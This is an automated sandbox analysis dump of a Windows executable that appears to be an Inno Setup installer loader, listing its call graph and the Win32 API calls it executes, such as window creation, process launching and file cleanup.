5828->5829 5830 4012aa 5828->5830 5829->5830 5830->5809 5830->5812 5832 401d92 5831->5832 5833 401d89 5831->5833 5832->5801 5833->5832 5840 401b74 5833->5840 5836 401b61 5835->5836 5837 401b52 5835->5837 5836->5802 5838 401d00 9 API calls 5837->5838 5839 401b5f 5838->5839 5839->5802 5843 40215c 5840->5843 5842 401b95 5842->5832 5844 40217a 5843->5844 5845 402175 5843->5845 5847 4021ab RtlEnterCriticalSection 5844->5847 5850 40217e 5844->5850 5853 4021b5 5844->5853 5846 401918 4 API calls 5845->5846 5846->5844 5847->5853 5848 4021c1 5851 4022e3 RtlLeaveCriticalSection 5848->5851 5852 4022ed 5848->5852 5849 402244 5849->5850 5854 401d80 7 API calls 5849->5854 5850->5842 5851->5852 5852->5842 5853->5848 5853->5849 5855 402270 5853->5855 5854->5850 5855->5848 5856 401d00 7 API calls 5855->5856 5856->5848 5858 401c7a 5857->5858 5859 401c9d 5858->5859 5860 401caf 5858->5860 5870 40188c 5859->5870 5862 40188c 3 API calls 5860->5862 5863 401cad 5862->5863 5864 401b44 9 API calls 5863->5864 5869 401cc5 5863->5869 5865 401cd4 5864->5865 5866 401cee 5865->5866 5880 401b98 5865->5880 5885 4013a0 5866->5885 5869->5786 5871 4018b2 5870->5871 5879 40190b 5870->5879 5889 401658 5871->5889 5874 40132c LocalAlloc 5875 4018cf 5874->5875 5876 4018e6 5875->5876 5877 40150c VirtualFree 5875->5877 5878 4013a0 LocalAlloc 5876->5878 5876->5879 5877->5876 5878->5879 5879->5863 5881 401b9d 5880->5881 5883 401bab 5880->5883 5882 401b74 9 API calls 5881->5882 5884 401baa 5882->5884 5883->5866 5884->5866 5886 4013ab 5885->5886 5887 4012e4 LocalAlloc 5886->5887 5888 4013c6 5886->5888 5887->5888 5888->5869 5890 40168f 5889->5890 5891 4016cf 5890->5891 5892 4016a9 VirtualFree 5890->5892 5891->5874 5892->5890 6849 402dfa 6850 402e26 6849->6850 6851 402e0d 6849->6851 6853 402ba4 6851->6853 6854 402bc9 6853->6854 6855 402bad 6853->6855 6854->6850 6856 402bb5 RaiseException 6855->6856 6856->6854 6857 4075fa GetFileSize 6858 407626 6857->6858 6859 407616 GetLastError 6857->6859 6859->6858 6860 40761f 6859->6860 6861 40748c 35 API calls 6860->6861 6861->6858 6862 406ffb 6863 407008 SetErrorMode 6862->6863 6531 403a80 CloseHandle 6532 403a90 6531->6532 6533 403a91 GetLastError 6531->6533 6534 404283 6535 4042c3 6534->6535 6536 403154 4 API calls 6535->6536 6537 404323 6536->6537 6864 404185 6865 4041ff 6864->6865 6866 403154 4 API calls 6865->6866 6867 4041cc 6865->6867 6868 404323 6866->6868 6538 403e87 6539 403e4c 6538->6539 6540 403e62 6539->6540 6541 403e7b 6539->6541 6542 403e67 6539->6542 6547 403cc8 6540->6547 6543 402674 4 API calls 6541->6543 6545 403e78 6542->6545 6551 402674 6542->6551 6543->6545 6548 403cd6 6547->6548 6549 402674 4 API calls 6548->6549 6550 403ceb 6548->6550 6549->6550 6550->6542 6552 403154 4 API calls 6551->6552 6553 40267a 6552->6553 6553->6545 6562 407e90 6563 407eb8 VirtualFree 6562->6563 6564 407e9d 6563->6564 6567 403e95 6568 403e4c 6567->6568 6569 403e62 6568->6569 6570 403e7b 6568->6570 6571 403e67 6568->6571 6573 403cc8 4 API calls 6569->6573 6572 402674 4 API calls 6570->6572 6574 403e78 6571->6574 6575 402674 4 API calls 6571->6575 6572->6574 6573->6571 6575->6574 6576 40ac97 6585 4096fc 6576->6585 6579 402f24 5 API calls 6580 40aca1 6579->6580 6581 403198 4 API calls 6580->6581 6582 40acc0 6581->6582 6583 403198 4 API calls 6582->6583 6584 40acc8 6583->6584 6594 4056ac 6585->6594 6587 409745 6590 403198 4 API calls 6587->6590 6588 409717 6588->6587 6600 40720c 6588->6600 6592 40975a 6590->6592 6591 409735 6593 40973d MessageBoxA 6591->6593 6592->6579 6592->6580 6593->6587 6595 403154 4 API calls 6594->6595 6596 4056b1 6595->6596 6597 4056c9 6596->6597 6598 403154 4 API calls 6596->6598 6597->6588 6599 4056bf 6598->6599 6599->6588 6601 4056ac 4 API calls 6600->6601 6602 40721b 6601->6602 6603 407221 6602->6603 6605 40722f 6602->6605 6604 40322c 4 API calls 6603->6604 6606 40722d 6604->6606 6607 40724b 6605->6607 6608 40723f 6605->6608 6606->6591 6618 4032b8 6607->6618 6611 4071d0 6608->6611 6612 40322c 4 API calls 6611->6612 6613 4071df 6612->6613 6614 4071fc 6613->6614 6615 406950 CharPrevA 6613->6615 6614->6606 6616 4071eb 6615->6616 6616->6614 6617 4032fc 18 API calls 6616->6617 6617->6614 6619 403278 18 API calls 6618->6619 6620 4032c2 6619->6620 6620->6606 6621 403a97 6622 403aac 6621->6622 6623 403bbc GetStdHandle 6622->6623 6624 403b0e CreateFileA 6622->6624 6625 403ab2 6622->6625 6626 403c17 GetLastError 6623->6626 6638 403bba 6623->6638 6624->6626 6627 403b2c 6624->6627 6626->6625 6629 403b3b GetFileSize 6627->6629 6627->6638 6629->6626 6630 403b4e SetFilePointer 6629->6630 6630->6626 6634 403b6a ReadFile 6630->6634 6631 403be7 GetFileType 6631->6625 6633 403c02 CloseHandle 6631->6633 6633->6625 6634->6626 6635 403b8c 6634->6635 6636 403b9f SetFilePointer 6635->6636 6635->6638 6636->6626 6637 403bb0 SetEndOfFile 6636->6637 6637->6626 6637->6638 6638->6625 6638->6631 6643 40aaa2 6644 40aad2 6643->6644 6645 40aadc CreateWindowExA SetWindowLongA 6644->6645 6646 405194 33 API calls 6645->6646 6647 40ab5f 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab6d 6648->6649 6650 4032fc 18 API calls 6649->6650 6651 40ab7a 6650->6651 6652 406b7c 19 API calls 6651->6652 6653 40ab86 6652->6653 6654 4032fc 18 API calls 6653->6654 6655 40ab8f 6654->6655 6656 4099ec 43 API calls 6655->6656 6657 40aba1 6656->6657 6658 4098cc 19 API calls 6657->6658 6659 40abb4 6657->6659 6658->6659 6660 40abed 6659->6660 6661 4094d8 9 API calls 6659->6661 6662 40ac06 6660->6662 6665 40ac00 RemoveDirectoryA 6660->6665 6661->6660 6663 40ac1a 6662->6663 6664 40ac0f DestroyWindow 6662->6664 6666 40ac42 6663->6666 6667 40357c 4 API calls 6663->6667 6664->6663 6665->6662 6668 40ac38 6667->6668 6669 4025ac 4 API calls 6668->6669 6669->6666 6881 405ba2 6883 405ba4 6881->6883 6882 405be0 6886 405940 19 API calls 6882->6886 6883->6882 6884 405bf7 6883->6884 6885 405bda 6883->6885 6889 404cdc 19 API calls 6884->6889 6885->6882 6887 405c4c 6885->6887 6894 405bf3 6886->6894 6888 4059b0 33 API calls 6887->6888 6888->6894 6890 405c20 6889->6890 6893 4059b0 33 API calls 6890->6893 6891 403198 4 API calls 6892 405c86 6891->6892 6893->6894 6894->6891 6895 408da4 6896 408dc8 6895->6896 6897 408c80 18 API calls 6896->6897 6898 408dd1 6897->6898 6670 402caa 6671 403154 4 API calls 6670->6671 6672 402caf 6671->6672 6913 4011aa 6914 4011ac GetStdHandle 6913->6914 6673 4028ac 6674 402594 18 API calls 6673->6674 6675 4028b6 6674->6675 4984 40aab4 4985 40aab8 SetLastError 4984->4985 5016 409648 GetLastError 4985->5016 4989 40aad2 4990 40aadc CreateWindowExA SetWindowLongA 4989->4990 5029 405194 4990->5029 4994 40ab6d 4995 4032fc 18 API calls 4994->4995 4996 40ab7a 4995->4996 5046 406b7c GetCommandLineA 4996->5046 4999 4032fc 18 API calls 5000 40ab8f 4999->5000 5051 4099ec 5000->5051 5002 40aba1 5004 40abb4 5002->5004 5072 4098cc 5002->5072 5005 40abd4 5004->5005 5006 40abed 5004->5006 5078 4094d8 5005->5078 5008 40ac06 5006->5008 5011 40ac00 RemoveDirectoryA 5006->5011 5009 40ac1a 5008->5009 5010 40ac0f DestroyWindow 5008->5010 5015 40ac42 5009->5015 5086 40357c 5009->5086 5010->5009 5011->5008 5013 40ac38 5099 4025ac 5013->5099 5104 404c94 5016->5104 5024 4096c3 5119 4031b8 5024->5119 5030 4051a8 33 API calls 5029->5030 5031 4051a3 5030->5031 5032 4032fc 5031->5032 5033 403300 5032->5033 5034 40333f 5032->5034 5035 4031e8 5033->5035 5036 40330a 5033->5036 5034->4994 5042 403254 18 API calls 5035->5042 5043 4031fc 5035->5043 5037 403334 5036->5037 5038 40331d 5036->5038 5039 4034f0 18 API calls 5037->5039 5280 4034f0 5038->5280 5045 403322 5039->5045 5040 403228 5040->4994 5042->5043 5043->5040 5044 4025ac 4 API calls 5043->5044 5044->5040 5045->4994 5306 406af0 5046->5306 5048 406ba1 5049 403198 4 API calls 5048->5049 5050 406bbf 5049->5050 5050->4999 5320 4033b4 5051->5320 5053 409a27 5054 409a59 CreateProcessA 5053->5054 5055 409a65 5054->5055 5056 409a6c CloseHandle 5054->5056 5058 409648 35 API calls 5055->5058 5057 409a75 5056->5057 5059 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5057->5059 5058->5056 5060 409a7a MsgWaitForMultipleObjects 5059->5060 5060->5057 5061 409a91 5060->5061 5062 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5061->5062 5063 409a96 GetExitCodeProcess CloseHandle 5062->5063 5064 409ab6 5063->5064 5065 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5064->5065 5066 409abe 5065->5066 5066->5002 5067 402f24 5068 403154 4 API calls 5067->5068 5069 402f29 5068->5069 5326 402bcc 5069->5326 5071 402f51 5071->5071 5073 40990e 5072->5073 5074 4098d4 5072->5074 5073->5004 5074->5073 5075 403420 18 API calls 5074->5075 5076 409908 5075->5076 5329 408e80 5076->5329 5079 409532 5078->5079 5083 4094eb 5078->5083 5079->5006 5080 4094f3 Sleep 5080->5083 5081 409503 Sleep 5081->5083 5083->5079 5083->5080 5083->5081 5084 40951a GetLastError 5083->5084 5352 408fbc 5083->5352 5084->5079 5085 409524 GetLastError 5084->5085 5085->5079 5085->5083 5087 403591 5086->5087 5088 4035a0 5086->5088 5091 4035d0 5087->5091 5092 40359b 5087->5092 5096 4035b6 5087->5096 5089 4035b1 5088->5089 5090 4035b8 5088->5090 5093 403198 4 API calls 5089->5093 5094 4031b8 4 API calls 5090->5094 5091->5096 5097 40357c 4 API calls 5091->5097 5092->5088 5095 4035ec 5092->5095 5093->5096 5094->5096 5095->5096 5369 403554 5095->5369 5096->5013 5097->5091 5100 4025ba 5099->5100 5102 4025b0 5099->5102 5100->5015 5101 402632 5101->5101 5102->5100 5102->5101 5103 403154 4 API calls 5102->5103 5103->5101 5127 4051a8 5104->5127 5107 407284 FormatMessageA 5108 4072aa 5107->5108 5109 403278 18 API calls 5108->5109 5110 4072c7 5109->5110 5111 408da8 5110->5111 5112 408dc8 5111->5112 5270 408c80 5112->5270 5115 405890 5116 405897 5115->5116 5117 4031e8 18 API calls 5116->5117 5118 4058af 5117->5118 5118->5024 5121 4031be 5119->5121 5120 4031e3 5123 403198 5120->5123 5121->5120 5122 4025ac 4 API calls 5121->5122 5122->5121 5124 4031b7 5123->5124 5125 40319e 5123->5125 5124->4989 5124->5067 5125->5124 5126 4025ac 4 API calls 5125->5126 5126->5124 5128 4051c5 5127->5128 5135 404e58 5128->5135 5131 4051f1 5140 403278 5131->5140 5137 404e73 5135->5137 5136 404e85 5136->5131 5145 404be4 5136->5145 5137->5136 5148 404f7a 5137->5148 5155 404e4c 5137->5155 5141 403254 18 API calls 5140->5141 5142 403288 5141->5142 5143 403198 4 API calls 5142->5143 5144 4032a0 5143->5144 5144->5107 5262 405940 5145->5262 5147 404bf5 5147->5131 5149 404f8b 5148->5149 5152 404fd9 5148->5152 5149->5152 5153 40505f 5149->5153 5151 404ff7 5151->5137 5152->5151 5158 404df4 5152->5158 5153->5151 5162 404e38 5153->5162 5156 403198 4 API calls 5155->5156 5157 404e56 5156->5157 5157->5137 5159 404e02 5158->5159 5165 404bfc 5159->5165 5161 404e30 5161->5152 5192 4039a4 5162->5192 5168 4059b0 5165->5168 5167 404c15 5167->5161 5169 4059be 5168->5169 5178 404cdc LoadStringA 5169->5178 5172 405194 33 API calls 5173 4059f6 5172->5173 5181 4031e8 5173->5181 5176 4031b8 4 API calls 5177 405a1b 5176->5177 5177->5167 5179 403278 18 API calls 5178->5179 5180 404d09 5179->5180 5180->5172 5182 4031ec 5181->5182 5185 4031fc 5181->5185 5182->5185 5187 403254 5182->5187 5183 403228 5183->5176 5185->5183 5186 4025ac 4 API calls 5185->5186 5186->5183 5188 403274 5187->5188 5189 403258 5187->5189 5188->5185 5190 402594 18 API calls 5189->5190 5191 403261 5190->5191 5191->5185 5193 4039ab 5192->5193 5198 4038b4 5193->5198 5195 4039cb 5196 403198 4 API calls 5195->5196 5197 4039d2 5196->5197 5197->5151 5199 4038d5 5198->5199 5200 4038c8 5198->5200 5202 403934 5199->5202 5203 4038db 5199->5203 5226 403780 5200->5226 5204 403993 5202->5204 5205 40393b 5202->5205 5206 4038e1 5203->5206 5207 4038ee 5203->5207 5209 4037f4 3 API calls 5204->5209 5210 403941 5205->5210 5211 40394b 5205->5211 5233 403894 5206->5233 5208 403894 6 API calls 5207->5208 5214 4038fc 5208->5214 5212 4038d0 5209->5212 5248 403864 5210->5248 5216 4037f4 3 API calls 5211->5216 5212->5195 5238 4037f4 5214->5238 5218 40395d 5216->5218 5219 403864 23 API calls 5218->5219 5221 403976 5219->5221 5220 403917 5244 40374c 5220->5244 5223 40374c VariantClear 5221->5223 5225 40398b 5223->5225 5224 40392c 5224->5195 5225->5195 5227 4037f0 5226->5227 5228 403744 5226->5228 5227->5212 5228->5226 5229 4037ab 5228->5229 5230 403793 VariantClear 5228->5230 5231 4037dc VariantCopyInd 5228->5231 5232 403198 4 API calls 5228->5232 5229->5212 5230->5228 5231->5227 5231->5228 5232->5228 5253 4036b8 5233->5253 5236 40374c VariantClear 5237 4038a9 5236->5237 5237->5212 5239 403845 VariantChangeTypeEx 5238->5239 5240 40380a VariantChangeTypeEx 5238->5240 5241 403832 5239->5241 5242 403826 5240->5242 5241->5220 5243 40374c VariantClear 5242->5243 5243->5241 5245 403766 5244->5245 5246 403759 5244->5246 5245->5224 5246->5245 5247 403779 VariantClear 5246->5247 5247->5224 5259 40369c SysStringLen 5248->5259 5251 40374c VariantClear 5252 403882 5251->5252 5252->5212 5254 4036cb 5253->5254 5255 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5254->5255 5256 4036db 5254->5256 5257 40372e 5255->5257 5258 4036ed MultiByteToWideChar SysAllocStringLen 5256->5258 5257->5236 5258->5257 5260 403610 21 API calls 5259->5260 5261 4036b3 5260->5261 5261->5251 5263 40594c 5262->5263 5264 404cdc 19 API calls 5263->5264 5265 405972 5264->5265 5266 4031e8 18 API calls 5265->5266 5267 40597d 5266->5267 5268 403198 4 API calls 5267->5268 5269 405992 5268->5269 5269->5147 5271 403198 4 API calls 5270->5271 5273 408cb1 5270->5273 5271->5273 5272 4031b8 4 API calls 5274 408d69 5272->5274 5275 408cc8 5273->5275 5276 403278 18 API calls 5273->5276 5278 408cdc 5273->5278 5279 4032fc 18 API calls 5273->5279 5274->5115 5277 4032fc 18 API calls 5275->5277 5276->5273 5277->5278 5278->5272 5279->5273 5281 4034fd 5280->5281 5288 40352d 5280->5288 5282 403526 5281->5282 5284 403509 5281->5284 5285 403254 18 API calls 5282->5285 5283 403198 4 API calls 5286 403517 5283->5286 5289 4025c4 5284->5289 5285->5288 5286->5045 5288->5283 5290 4025ca 5289->5290 5291 4025dc 5290->5291 5293 403154 5290->5293 5291->5286 5291->5291 5294 403164 5293->5294 5295 40318c TlsGetValue 5293->5295 5294->5291 5296 403196 5295->5296 5297 40316f 5295->5297 5296->5291 5301 40310c 5297->5301 5299 403174 TlsGetValue 5300 403184 5299->5300 5300->5291 5302 403120 LocalAlloc 5301->5302 5303 403116 5301->5303 5304 40313e TlsSetValue 5302->5304 5305 403132 5302->5305 5303->5302 5304->5305 5305->5299 5307 406b1c 5306->5307 5308 403278 18 API calls 5307->5308 5309 406b29 5308->5309 5316 403420 5309->5316 5311 406b31 5312 4031e8 18 API calls 5311->5312 5313 406b49 5312->5313 5314 403198 4 API calls 5313->5314 5315 406b6b 5314->5315 5315->5048 5317 403426 5316->5317 5319 403437 5316->5319 5318 403254 18 API calls 5317->5318 5317->5319 5318->5319 5319->5311 5321 4033bc 5320->5321 5322 403254 18 API calls 5321->5322 5323 4033cf 5322->5323 5324 4031e8 18 API calls 5323->5324 5325 4033f7 5324->5325 5327 402bd5 RaiseException 5326->5327 5328 402be6 5326->5328 5327->5328 5328->5071 5330 408e8e 5329->5330 5332 408ea6 5330->5332 5342 408e18 5330->5342 5333 408e18 18 API calls 5332->5333 5334 408eca 5332->5334 5333->5334 5345 407918 5334->5345 5336 408ee5 5337 408e18 18 API calls 5336->5337 5338 408ef8 5336->5338 5337->5338 5339 408e18 18 API calls 5338->5339 5340 403278 18 API calls 5338->5340 5341 408f27 5338->5341 5339->5338 5340->5338 5341->5073 5343 405890 18 API calls 5342->5343 5344 408e29 5343->5344 5344->5332 5348 4078c4 5345->5348 5349 4078d6 5348->5349 5350 4078e7 5348->5350 5351 4078db InterlockedExchange 5349->5351 5350->5336 5351->5350 5360 408f70 5352->5360 5354 408fd2 5355 408fd6 5354->5355 5356 408ff2 DeleteFileA GetLastError 5354->5356 5355->5083 5357 409010 5356->5357 5366 408fac 5357->5366 5361 408f7a 5360->5361 5362 408f7e 5360->5362 5361->5354 5363 408fa0 SetLastError 5362->5363 5364 408f87 Wow64DisableWow64FsRedirection 5362->5364 5365 408f9b 5363->5365 5364->5365 5365->5354 5367 408fb1 Wow64RevertWow64FsRedirection 5366->5367 5368 408fbb 5366->5368 5367->5368 5368->5083 5371 403566 5369->5371 5372 403578 5371->5372 5373 403604 5371->5373 5372->5095 5374 40357c 5373->5374 5377 40359b 5374->5377 5380 4035a0 5374->5380 5382 4035b6 5374->5382 5383 4035d0 5374->5383 5375 4035b1 5378 403198 4 API calls 5375->5378 5376 4035b8 5379 4031b8 4 API calls 5376->5379 5377->5380 5381 4035ec 5377->5381 5378->5382 5379->5382 5380->5375 5380->5376 5381->5382 5385 403554 4 API calls 5381->5385 5382->5371 5383->5382 5384 40357c 4 API calls 5383->5384 5384->5383 5385->5381 6676 401ab9 6677 401a96 6676->6677 6678 401aa9 RtlDeleteCriticalSection 6677->6678 6679 401a9f RtlLeaveCriticalSection 6677->6679 6679->6678

                                                              Executed Functions

                                                              Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                              • String ID:
                                                              • API String ID: 2441996862-0
                                                              • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                              • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                              • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                              • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                              Function 0040520C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                              • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                              • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                              • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED
                                                              Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                              Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • SetLastError.KERNEL32 ref: 0040AAC1
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02101D74), ref: 0040966C
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                              • SetWindowLongA.USER32(00010452,000000FC,00409960), ref: 0040AB15
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                              • DestroyWindow.USER32(00010452,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 3757039580-3001827809
                                                              • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                              • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                              • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                              • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D
                                                              Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113
                                                              • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                              • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                              • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                              • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
                                                              Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                              • SetWindowLongA.USER32(00010452,000000FC,00409960), ref: 0040AB15
                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000,00409ABF), ref: 00409A5C
